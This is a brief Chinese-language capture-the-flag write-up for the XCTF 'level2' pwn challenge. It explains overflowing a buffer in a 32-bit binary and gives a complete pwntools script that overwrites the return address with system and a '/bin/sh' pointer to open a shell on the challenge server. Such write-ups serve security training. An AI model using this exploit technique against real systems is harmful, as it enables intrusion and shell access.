[攻防世界 pwn]——level2
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
32位程序
IDA中, 找到system和 ‘/bin/sh’ 地址进行覆盖
exploit
from pwn import *
p = remote("111.200.241.244",55083)
system_addr = 0x0804845C
binsh = 0x0804A024
payload = 'a' * (0x88 + 0x4) + p32(system_addr) + p32(binsh)
p.sendline(payload)
p.interactive()